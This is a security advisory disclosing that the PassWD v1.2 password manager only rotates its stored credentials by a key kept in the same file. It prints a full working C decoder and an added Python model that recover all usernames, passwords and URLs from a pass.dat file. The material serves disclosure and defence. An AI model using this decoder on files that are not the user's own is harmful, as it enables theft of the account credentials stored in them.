COMMAND
PassWD
SYSTEMS AFFECTED
PassWD v1.2
PROBLEM
Daniel Roethlisberger found the following. PassWD is a password
management program designed to store all of a user's username and
password combinations along with a site URL. Because PassWD is
being distributed by well-known free/shareware download sites such
as tucows.com, the community should be aware that it is very
insecure.
The documentation claims that PassWD employs encryption. In fact
it uses a very weak encoding that can easily be decoded. If an
attacker can get hold of the password file (usually this will be
pass.dat in PassWD's directory, which can be found in the
Registry), he can easily decode the file and thus retrieve the
user/password combinations along with the matching links, and the
master password used to `protect' the password list. This is also
very easily exploitable by malware such as password-gathering
trojans.
PassWD stores all the sensitive data in a file usually called
pass.dat (the name can be changed in PassWD's INI file).
Unfortunately, it not only employs a very weak encoding algorithm,
but it also stores the key in the same file. This key is purely
random and is in no way dependent on the master password, so the
master password protects nothing.
The key can take a value between 1 and 99, which shows the extreme
weakness of the system: the character set, consisting of 99
characters, is simply rotated by <key> positions.
The source code below illustrates this. It can be used to decode
any given PassWD v1.2 `pass.dat' file to either stdout or an
output file.
/*
 * Decoder for PassWD v1.2 `pass.dat' password files
 *
 * Written 2000 by Daniel Roethlisberger <admin@roe.ch>
 *
 * This code is hereby placed in the public domain.
 * Use this code at your own risk for whatever you want.
 *
 * The decoded data is not parsed in any way - it should
 * be very easy to moderately experienced programmers
 * to add that themselves.
 *
 */
#include <stdio.h>

int main(int argc, char *argv[])
{
    unsigned char charpos;
    FILE *outfile;
    FILE *infile;
    int a;    /* encoded key byte 1 (int so that EOF can be detected) */
    int b;    /* encoded key byte 2 */
    int x;    /* current input byte */
    int key;
    /* The 99-character alphabet PassWD rotates: 4 control characters
     * followed by all 95 printable ASCII characters. It is written out
     * twice so that `charpos + 99 - key' never needs an explicit wrap. */
    unsigned char charset[] =
        "\b\t\n\r !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~"
        "\b\t\n\r !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~";

    printf("\nDecoder for PassWD v1.2 `pass.dat' password files\n");
    printf("Written 2000 by Daniel Roethlisberger <admin@roe.ch>\n\n");

    if((argc > 3) || (argc < 2))
    {
        printf("Usage: %s <infile> [<outfile>]\n\n", argv[0]);
        printf("If <outfile> is omitted, the output is dumped to stdout.\n");
        return 1;
    }

    /* binary mode: the file contains raw control characters */
    infile = fopen(argv[1], "rb");
    if(infile == NULL)
    {
        printf("Could not open file %s\n", argv[1]);
        return 1;
    }

    if(argc == 2)
        outfile = stdout;
    else
    {
        outfile = fopen(argv[2], "wb");
        if(outfile == NULL)
        {
            printf("Could not write to file %s\n", argv[2]);
            fclose(infile);
            return 1;
        }
    }

    getc(infile);      /* jump over decoy byte */
    a = getc(infile);  /* read encoded key byte 1 */
    b = getc(infile);  /* read encoded key byte 2 */
    if(a == EOF || b == EOF)
    {
        printf("ERROR - encountered EOF within header\n");
        fclose(infile);
        if(outfile != stdout)
            fclose(outfile);
        return 1;
    }

    /* this line `decodes' the key: each header byte is one decimal
     * digit of the key added to the character 'b' */
    key = (a - 'b') * 10 + (b - 'b');
    if(key < 1 || key > 99)
    {
        printf("ERROR - key %d outside the valid range 1..99\n", key);
        fclose(infile);
        if(outfile != stdout)
            fclose(outfile);
        return 1;
    }

    /* read through infile and dump decoded output to outfile: */
    while((x = getc(infile)) != EOF)
    {
        for(charpos = 0; x != charset[charpos]; charpos++)
        {
            if(charpos > 99)
            {
                printf("\nERROR - encountered illegal character in source file\n");
                fclose(infile);
                if(outfile != stdout)
                    fclose(outfile);
                return 1;
            }
        }
        /* plain = cypher - key (the doubled charset handles the wrap) */
        putc(charset[charpos + 99 - key], outfile);
    }

    if(argc == 2)
        printf("\n\n");
    printf("Done.\n");
    fclose(infile);
    if(outfile != stdout)
        fclose(outfile);
    return 0;
}
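The following Python model is an added illustration for this advisory; it is not PassWD's code and not the decoder above. It re-implements the scheme the decoder reveals, a 99-symbol alphabet rotated by the key and the key written into the file header as two bytes offset from 'b', so that both directions can be checked side by side. The value of the decoy byte and the sample record are constructed assumptions; the advisory only says the first byte is skipped.

```python
# Model of the PassWD v1.2 pass.dat encoding, written for this advisory.
# Not PassWD's code. Constructed assumptions are marked as such.

# The 99-symbol alphabet the decoder rotates: four control characters
# followed by the 95 printable ASCII characters (0x20..0x7E).
ALPHABET = "\b\t\n\r" + "".join(chr(c) for c in range(0x20, 0x7F))
assert len(ALPHABET) == 99

# Constructed assumption: the advisory only says the first byte is skipped.
DECOY = b"\x00"


def encode_key(key: int) -> bytes:
    """The two header bytes: each decimal digit of the key added to 'b'."""
    if not 1 <= key <= 99:
        raise ValueError("PassWD keys range from 1 to 99")
    return bytes([ord("b") + key // 10, ord("b") + key % 10])


def decode_key(header: bytes) -> int:
    """Inverse of encode_key, exactly as the advisory's decoder computes it."""
    return (header[0] - ord("b")) * 10 + (header[1] - ord("b"))


def rotate(text: str, shift: int) -> str:
    """Caesar shift over ALPHABET; a negative shift decodes.

    ALPHABET.index raises ValueError for a character outside the set,
    matching the decoder's 'illegal character' error."""
    n = len(ALPHABET)
    return "".join(ALPHABET[(ALPHABET.index(ch) + shift) % n] for ch in text)


def encode_file(plaintext: str, key: int) -> bytes:
    """Model of a pass.dat: decoy byte, encoded key, then the rotated body."""
    return DECOY + encode_key(key) + rotate(plaintext, key).encode("ascii")


def decode_file(data: bytes) -> tuple[int, str]:
    """Everything needed to decode travels inside the file itself; the
    master password is never consulted."""
    key = decode_key(data[1:3])
    return key, rotate(data[3:].decode("ascii"), -key)


def candidate_plaintexts(body: bytes) -> list[str]:
    """Even with the header stripped, a body has only 99 possible
    decodings, one per key: the entire key space the advisory criticises."""
    text = body.decode("ascii")
    return [rotate(text, -k) for k in range(1, 100)]


if __name__ == "__main__":
    # Constructed sample entry: URL, username, password, CRLF terminator.
    record = "https://example.test\talice\tS3cret!\r\n"
    blob = encode_file(record, key=37)
    print("header bytes:", blob[:3])          # b'\x00ei'
    print("recovered   :", decode_file(blob))  # (37, record)
    print("key space   :", len(candidate_plaintexts(blob[3:])))  # 99
```

The header bytes make the point without any cryptanalysis: for key 37 the file begins with the characters 'e' and 'i' (3 and 7 added to 'b'), so whoever can read pass.dat can read the key, and the master password plays no part in protecting the entries.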
SOLUTION
The author of PassWD has been informed. He is informing registered
users of PassWD and any distribution sites offering PassWD v1.2
for download. The author is no longer developing PassWD v1.2, so
there will be no patch or update. Instead there is a successor
product called PassWD 2000, which will be released shortly. The
author claims that it will employ a better (real) encryption
algorithm.
One possible workaround is to install PassWD on an encrypted hard
disk (e.g. using PGPdisk or ScramDisk).